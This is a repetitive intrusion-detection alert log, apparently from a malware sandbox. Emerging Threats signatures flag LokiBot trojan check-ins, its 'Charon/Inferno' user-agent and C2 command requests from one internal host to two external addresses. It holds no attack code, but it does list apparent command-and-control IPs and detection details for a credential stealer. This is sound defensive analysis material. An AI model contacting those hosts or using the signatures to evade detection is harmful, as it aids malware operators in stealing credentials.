                                      07/15/21-12:44:21.063344TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.3172.67.155.45
                                      07/15/21-12:44:21.063344TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.3172.67.155.45
                                      07/15/21-12:44:21.652030TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979080192.168.2.3172.67.155.45
                                      07/15/21-12:44:21.652030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979080192.168.2.3172.67.155.45
                                      07/15/21-12:44:21.652030TCP2025381ET TROJAN LokiBot Checkin4979080192.168.2.3172.67.155.45
                                      07/15/21-12:44:22.178744TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979180192.168.2.3104.21.6.222
                                      07/15/21-12:44:22.178744TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.3104.21.6.222
                                      07/15/21-12:44:22.178744TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.3104.21.6.222
                                      07/15/21-12:44:22.680957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.3172.67.155.45
                                      07/15/21-12:44:22.680957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979280192.168.2.3172.67.155.45
                                      07/15/21-12:44:22.680957TCP2025381ET TROJAN LokiBot Checkin4979280192.168.2.3172.67.155.45
                                      07/15/21-12:44:23.184833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.3172.67.155.45
                                      07/15/21-12:44:23.184833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979380192.168.2.3172.67.155.45
                                      07/15/21-12:44:23.184833TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.3172.67.155.45
                                      07/15/21-12:44:23.719947TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.3104.21.6.222
                                      07/15/21-12:44:23.719947TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.3104.21.6.222
                                      07/15/21-12:44:23.719947TCP2025381ET TROJAN LokiBot Checkin4979480192.168.2.3104.21.6.222
                                      07/15/21-12:44:24.247620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.3172.67.155.45
                                      07/15/21-12:44:24.247620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.3172.67.155.45
                                      07/15/21-12:44:24.247620TCP2025381ET TROJAN LokiBot Checkin4979580192.168.2.3172.67.155.45
                                      07/15/21-12:44:24.786585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979680192.168.2.3172.67.155.45
                                      07/15/21-12:44:24.786585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979680192.168.2.3172.67.155.45
                                      07/15/21-12:44:24.786585TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.3172.67.155.45
                                      07/15/21-12:44:25.284023TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.3104.21.6.222
                                      07/15/21-12:44:25.284023TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.3104.21.6.222
                                      07/15/21-12:44:25.284023TCP2025381ET TROJAN LokiBot Checkin4979780192.168.2.3104.21.6.222
                                      07/15/21-12:44:25.779168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979880192.168.2.3172.67.155.45
                                      07/15/21-12:44:25.779168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979880192.168.2.3172.67.155.45
                                      07/15/21-12:44:25.779168TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.3172.67.155.45
                                      07/15/21-12:44:26.353667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979980192.168.2.3104.21.6.222
                                      07/15/21-12:44:26.353667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979980192.168.2.3104.21.6.222
                                      07/15/21-12:44:26.353667TCP2025381ET TROJAN LokiBot Checkin4979980192.168.2.3104.21.6.222
                                      07/15/21-12:44:26.904175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.3104.21.6.222
                                      07/15/21-12:44:26.904175TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980080192.168.2.3104.21.6.222
                                      07/15/21-12:44:26.904175TCP2025381ET TROJAN LokiBot Checkin4980080192.168.2.3104.21.6.222
                                      07/15/21-12:44:27.448159TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980180192.168.2.3172.67.155.45
                                      07/15/21-12:44:27.448159TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980180192.168.2.3172.67.155.45
                                      07/15/21-12:44:27.448159TCP2025381ET TROJAN LokiBot Checkin4980180192.168.2.3172.67.155.45
                                      07/15/21-12:44:28.025245TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.3172.67.155.45
                                      07/15/21-12:44:28.025245TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980280192.168.2.3172.67.155.45
                                      07/15/21-12:44:28.025245TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.3172.67.155.45
                                      07/15/21-12:44:28.570586TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.3172.67.155.45
                                      07/15/21-12:44:28.570586TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.3172.67.155.45
                                      07/15/21-12:44:28.570586TCP2025381ET TROJAN LokiBot Checkin4980380192.168.2.3172.67.155.45
                                      07/15/21-12:44:29.405322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980480192.168.2.3104.21.6.222
                                      07/15/21-12:44:29.405322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.3104.21.6.222
                                      07/15/21-12:44:29.405322TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.3104.21.6.222
                                      07/15/21-12:44:29.965275TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980580192.168.2.3172.67.155.45
                                      07/15/21-12:44:29.965275TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.3172.67.155.45
                                      07/15/21-12:44:29.965275TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.3172.67.155.45
                                      07/15/21-12:44:30.816047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.3172.67.155.45
                                      07/15/21-12:44:30.816047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.3172.67.155.45
                                      07/15/21-12:44:30.816047TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.3172.67.155.45
                                      07/15/21-12:44:31.313119TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980780192.168.2.3172.67.155.45
                                      07/15/21-12:44:31.313119TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980780192.168.2.3172.67.155.45
                                      07/15/21-12:44:31.313119TCP2025381ET TROJAN LokiBot Checkin4980780192.168.2.3172.67.155.45
                                      07/15/21-12:44:31.831491TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980880192.168.2.3104.21.6.222
                                      07/15/21-12:44:31.831491TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980880192.168.2.3104.21.6.222
                                      07/15/21-12:44:31.831491TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.3104.21.6.222
                                      07/15/21-12:44:32.367486TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980980192.168.2.3104.21.6.222
                                      07/15/21-12:44:32.367486TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3104.21.6.222
                                      07/15/21-12:44:32.367486TCP2025381ET TROJAN LokiBot Checkin4980980192.168.2.3104.21.6.222
                                      07/15/21-12:44:32.911797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981080192.168.2.3172.67.155.45
                                      07/15/21-12:44:32.911797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981080192.168.2.3172.67.155.45
                                      07/15/21-12:44:32.911797TCP2025381ET TROJAN LokiBot Checkin4981080192.168.2.3172.67.155.45
                                      07/15/21-12:44:33.437657TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981180192.168.2.3172.67.155.45
                                      07/15/21-12:44:33.437657TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.3172.67.155.45
                                      07/15/21-12:44:33.437657TCP2025381ET TROJAN LokiBot Checkin4981180192.168.2.3172.67.155.45
                                      07/15/21-12:44:33.951079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981280192.168.2.3104.21.6.222
                                      07/15/21-12:44:33.951079TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.3104.21.6.222
                                      07/15/21-12:44:33.951079TCP2025381ET TROJAN LokiBot Checkin4981280192.168.2.3104.21.6.222
                                      07/15/21-12:44:34.459346TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3104.21.6.222
                                      07/15/21-12:44:34.459346TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3104.21.6.222
                                      07/15/21-12:44:34.459346TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3104.21.6.222
                                      07/15/21-12:44:34.994338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3104.21.6.222
                                      07/15/21-12:44:34.994338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3104.21.6.222
                                      07/15/21-12:44:34.994338TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3104.21.6.222
                                      07/15/21-12:44:35.507626TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.3104.21.6.222
                                      07/15/21-12:44:35.507626TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.3104.21.6.222
                                      07/15/21-12:44:35.507626TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.3104.21.6.222
                                      07/15/21-12:44:36.112577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981680192.168.2.3172.67.155.45
                                      07/15/21-12:44:36.112577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.3172.67.155.45
                                      07/15/21-12:44:36.112577TCP2025381ET TROJAN LokiBot Checkin4981680192.168.2.3172.67.155.45
                                      07/15/21-12:44:36.636158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3104.21.6.222
                                      07/15/21-12:44:36.636158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.2.3104.21.6.222
                                      07/15/21-12:44:36.636158TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3104.21.6.222
                                      07/15/21-12:44:37.137891TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981880192.168.2.3172.67.155.45
                                      07/15/21-12:44:37.137891TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981880192.168.2.3172.67.155.45
                                      07/15/21-12:44:37.137891TCP2025381ET TROJAN LokiBot Checkin4981880192.168.2.3172.67.155.45
                                      07/15/21-12:44:37.802137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981980192.168.2.3172.67.155.45
                                      07/15/21-12:44:37.802137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981980192.168.2.3172.67.155.45
                                      07/15/21-12:44:37.802137TCP2025381ET TROJAN LokiBot Checkin4981980192.168.2.3172.67.155.45
                                      07/15/21-12:44:38.314249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3104.21.6.222
                                      07/15/21-12:44:38.314249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982080192.168.2.3104.21.6.222
                                      07/15/21-12:44:38.314249TCP2025381ET TROJAN LokiBot Checkin4982080192.168.2.3104.21.6.222
                                      07/15/21-12:44:38.844782TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3104.21.6.222
                                      07/15/21-12:44:38.844782TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3104.21.6.222
                                      07/15/21-12:44:38.844782TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3104.21.6.222
                                      07/15/21-12:44:39.404854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3172.67.155.45
                                      07/15/21-12:44:39.404854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3172.67.155.45
                                      07/15/21-12:44:39.404854TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3172.67.155.45
                                      07/15/21-12:44:40.218810TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3172.67.155.45
                                      07/15/21-12:44:40.218810TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3172.67.155.45
                                      07/15/21-12:44:40.218810TCP2025381ET TROJAN LokiBot Checkin4982380192.168.2.3172.67.155.45
                                      07/15/21-12:44:40.848513TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.3104.21.6.222
                                      07/15/21-12:44:40.848513TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.3104.21.6.222
                                      07/15/21-12:44:40.848513TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.3104.21.6.222
                                      07/15/21-12:44:41.921113TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3104.21.6.222
                                      07/15/21-12:44:41.921113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3104.21.6.222
                                      07/15/21-12:44:41.921113TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3104.21.6.222
                                      07/15/21-12:44:43.205039TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.3172.67.155.45
                                      07/15/21-12:44:43.205039TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.3172.67.155.45
                                      07/15/21-12:44:43.205039TCP2025381ET TROJAN LokiBot Checkin4982680192.168.2.3172.67.155.45
                                      07/15/21-12:44:43.739356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982780192.168.2.3104.21.6.222
                                      07/15/21-12:44:43.739356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3104.21.6.222
                                      07/15/21-12:44:43.739356TCP2025381ET TROJAN LokiBot Checkin4982780192.168.2.3104.21.6.222
                                      07/15/21-12:44:44.242282TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.2.3104.21.6.222
                                      07/15/21-12:44:44.242282TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.3104.21.6.222
                                      07/15/21-12:44:44.242282TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.3104.21.6.222
                                      07/15/21-12:44:44.738337TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3104.21.6.222
                                      07/15/21-12:44:44.738337TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982980192.168.2.3104.21.6.222
                                      07/15/21-12:44:44.738337TCP2025381ET TROJAN LokiBot Checkin4982980192.168.2.3104.21.6.222
                                      07/15/21-12:44:45.255252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983180192.168.2.3172.67.155.45
                                      07/15/21-12:44:45.255252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983180192.168.2.3172.67.155.45
                                      07/15/21-12:44:45.255252TCP2025381ET TROJAN LokiBot Checkin4983180192.168.2.3172.67.155.45
                                      07/15/21-12:44:45.794180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983280192.168.2.3172.67.155.45
                                      07/15/21-12:44:45.794180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3172.67.155.45
                                      07/15/21-12:44:45.794180TCP2025381ET TROJAN LokiBot Checkin4983280192.168.2.3172.67.155.45
                                      07/15/21-12:44:46.302137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983380192.168.2.3104.21.6.222
                                      07/15/21-12:44:46.302137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983380192.168.2.3104.21.6.222
                                      07/15/21-12:44:46.302137TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3104.21.6.222
                                      07/15/21-12:44:46.804553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983580192.168.2.3172.67.155.45
                                      07/15/21-12:44:46.804553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.3172.67.155.45
                                      07/15/21-12:44:46.804553TCP2025381ET TROJAN LokiBot Checkin4983580192.168.2.3172.67.155.45
                                      07/15/21-12:44:47.326471TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983680192.168.2.3172.67.155.45
                                      07/15/21-12:44:47.326471TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983680192.168.2.3172.67.155.45
                                      07/15/21-12:44:47.326471TCP2025381ET TROJAN LokiBot Checkin4983680192.168.2.3172.67.155.45
                                      07/15/21-12:44:47.878792TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983780192.168.2.3104.21.6.222
                                      07/15/21-12:44:47.878792TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.3104.21.6.222
                                      07/15/21-12:44:47.878792TCP2025381ET TROJAN LokiBot Checkin4983780192.168.2.3104.21.6.222
                                      07/15/21-12:44:48.411434TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983880192.168.2.3104.21.6.222
                                      07/15/21-12:44:48.411434TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983880192.168.2.3104.21.6.222
                                      07/15/21-12:44:48.411434TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.3104.21.6.222
                                      07/15/21-12:44:48.918283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14983980192.168.2.3172.67.155.45
                                      07/15/21-12:44:48.918283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983980192.168.2.3172.67.155.45
                                      07/15/21-12:44:48.918283TCP2025381ET TROJAN LokiBot Checkin4983980192.168.2.3172.67.155.45
                                      07/15/21-12:44:49.450255TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984080192.168.2.3172.67.155.45
                                      07/15/21-12:44:49.450255TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984080192.168.2.3172.67.155.45
                                      07/15/21-12:44:49.450255TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.3172.67.155.45
                                      07/15/21-12:44:49.943382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.3172.67.155.45
                                      07/15/21-12:44:49.943382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984180192.168.2.3172.67.155.45
                                      07/15/21-12:44:49.943382TCP2025381ET TROJAN LokiBot Checkin4984180192.168.2.3172.67.155.45
                                      07/15/21-12:44:50.459167TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984280192.168.2.3104.21.6.222
                                      07/15/21-12:44:50.459167TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984280192.168.2.3104.21.6.222
                                      07/15/21-12:44:50.459167TCP2025381ET TROJAN LokiBot Checkin4984280192.168.2.3104.21.6.222
                                      07/15/21-12:44:51.000294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984380192.168.2.3104.21.6.222
                                      07/15/21-12:44:51.000294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984380192.168.2.3104.21.6.222
                                      07/15/21-12:44:51.000294TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.3104.21.6.222
                                      07/15/21-12:44:51.527109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.2.3172.67.155.45
                                      07/15/21-12:44:51.527109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.2.3172.67.155.45
                                      07/15/21-12:44:51.527109TCP2025381ET TROJAN LokiBot Checkin4984480192.168.2.3172.67.155.45
                                      07/15/21-12:44:52.047049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.2.3172.67.155.45
                                      07/15/21-12:44:52.047049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.2.3172.67.155.45
                                      07/15/21-12:44:52.047049TCP2025381ET TROJAN LokiBot Checkin4984580192.168.2.3172.67.155.45
                                      07/15/21-12:44:52.581900TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.2.3104.21.6.222
                                      07/15/21-12:44:52.581900TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.2.3104.21.6.222
                                      07/15/21-12:44:52.581900TCP2025381ET TROJAN LokiBot Checkin4984680192.168.2.3104.21.6.222
                                      07/15/21-12:44:53.082180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.2.3172.67.155.45
                                      07/15/21-12:44:53.082180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.2.3172.67.155.45
                                      07/15/21-12:44:53.082180TCP2025381ET TROJAN LokiBot Checkin4984780192.168.2.3172.67.155.45
                                      07/15/21-12:44:53.609942TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.2.3104.21.6.222
                                      07/15/21-12:44:53.609942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.2.3104.21.6.222
                                      07/15/21-12:44:53.609942TCP2025381ET TROJAN LokiBot Checkin4984880192.168.2.3104.21.6.222
                                      07/15/21-12:44:54.119129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.2.3172.67.155.45
                                      07/15/21-12:44:54.119129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.2.3172.67.155.45
                                      07/15/21-12:44:54.119129TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.3172.67.155.45
                                      07/15/21-12:44:54.699547TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.3104.21.6.222
                                      07/15/21-12:44:54.699547TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3104.21.6.222
                                      07/15/21-12:44:54.699547TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3104.21.6.222
                                      07/15/21-12:44:55.197726TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3172.67.155.45
                                      07/15/21-12:44:55.197726TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.2.3172.67.155.45
                                      07/15/21-12:44:55.197726TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3172.67.155.45
                                      07/15/21-12:44:55.710878TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3172.67.155.45
                                      07/15/21-12:44:55.710878TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3172.67.155.45
                                      07/15/21-12:44:55.710878TCP2025381ET TROJAN LokiBot Checkin4985280192.168.2.3172.67.155.45
                                      07/15/21-12:44:56.214617TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.2.3172.67.155.45
                                      07/15/21-12:44:56.214617TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.2.3172.67.155.45
                                      07/15/21-12:44:56.214617TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3172.67.155.45
                                      07/15/21-12:44:56.714371TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.2.3172.67.155.45
                                      07/15/21-12:44:56.714371TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.2.3172.67.155.45
                                      07/15/21-12:44:56.714371TCP2025381ET TROJAN LokiBot Checkin4985480192.168.2.3172.67.155.45
                                      07/15/21-12:44:57.212311TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.2.3104.21.6.222
                                      07/15/21-12:44:57.212311TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3104.21.6.222
                                      07/15/21-12:44:57.212311TCP2025381ET TROJAN LokiBot Checkin4985580192.168.2.3104.21.6.222
                                      07/15/21-12:44:57.731595TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985680192.168.2.3172.67.155.45
                                      07/15/21-12:44:57.731595TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985680192.168.2.3172.67.155.45
                                      07/15/21-12:44:57.731595TCP2025381ET TROJAN LokiBot Checkin4985680192.168.2.3172.67.155.45
                                      07/15/21-12:44:58.262469TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3172.67.155.45
                                      07/15/21-12:44:58.262469TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985780192.168.2.3172.67.155.45
                                      07/15/21-12:44:58.262469TCP2025381ET TROJAN LokiBot Checkin4985780192.168.2.3172.67.155.45
                                      07/15/21-12:44:58.800402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985880192.168.2.3172.67.155.45
                                      07/15/21-12:44:58.800402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3172.67.155.45
                                      07/15/21-12:44:58.800402TCP2025381ET TROJAN LokiBot Checkin4985880192.168.2.3172.67.155.45
                                      07/15/21-12:44:59.313236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985980192.168.2.3104.21.6.222
                                      07/15/21-12:44:59.313236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3104.21.6.222
                                      07/15/21-12:44:59.313236TCP2025381ET TROJAN LokiBot Checkin4985980192.168.2.3104.21.6.222
                                      07/15/21-12:44:59.820403TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986080192.168.2.3104.21.6.222
                                      07/15/21-12:44:59.820403TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3104.21.6.222
                                      07/15/21-12:44:59.820403TCP2025381ET TROJAN LokiBot Checkin4986080192.168.2.3104.21.6.222
                                      07/15/21-12:45:00.312027TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3104.21.6.222
                                      07/15/21-12:45:00.312027TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986180192.168.2.3104.21.6.222
                                      07/15/21-12:45:00.312027TCP2025381ET TROJAN LokiBot Checkin4986180192.168.2.3104.21.6.222
                                      07/15/21-12:45:00.841449TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986280192.168.2.3172.67.155.45
                                      07/15/21-12:45:00.841449TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986280192.168.2.3172.67.155.45
                                      07/15/21-12:45:00.841449TCP2025381ET TROJAN LokiBot Checkin4986280192.168.2.3172.67.155.45
                                      07/15/21-12:45:01.372535TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986380192.168.2.3104.21.6.222
                                      07/15/21-12:45:01.372535TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986380192.168.2.3104.21.6.222
                                      07/15/21-12:45:01.372535TCP2025381ET TROJAN LokiBot Checkin4986380192.168.2.3104.21.6.222
                                      07/15/21-12:45:01.980264TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986480192.168.2.3104.21.6.222
                                      07/15/21-12:45:01.980264TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.3104.21.6.222
                                      07/15/21-12:45:01.980264TCP2025381ET TROJAN LokiBot Checkin4986480192.168.2.3104.21.6.222
                                      07/15/21-12:45:02.763634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986580192.168.2.3104.21.6.222
                                      07/15/21-12:45:02.763634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986580192.168.2.3104.21.6.222
                                      07/15/21-12:45:02.763634TCP2025381ET TROJAN LokiBot Checkin4986580192.168.2.3104.21.6.222
                                      07/15/21-12:45:03.711816TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986680192.168.2.3104.21.6.222
                                      07/15/21-12:45:03.711816TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986680192.168.2.3104.21.6.222
                                      07/15/21-12:45:03.711816TCP2025381ET TROJAN LokiBot Checkin4986680192.168.2.3104.21.6.222
                                      07/15/21-12:45:04.399651TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3172.67.155.45
                                      07/15/21-12:45:04.399651TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3172.67.155.45
                                      07/15/21-12:45:04.399651TCP2025381ET TROJAN LokiBot Checkin4986780192.168.2.3172.67.155.45
                                      07/15/21-12:45:04.939385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986880192.168.2.3104.21.6.222
                                      07/15/21-12:45:04.939385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986880192.168.2.3104.21.6.222
                                      07/15/21-12:45:04.939385TCP2025381ET TROJAN LokiBot Checkin4986880192.168.2.3104.21.6.222
                                      07/15/21-12:45:05.460171TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986980192.168.2.3104.21.6.222
                                      07/15/21-12:45:05.460171TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986980192.168.2.3104.21.6.222
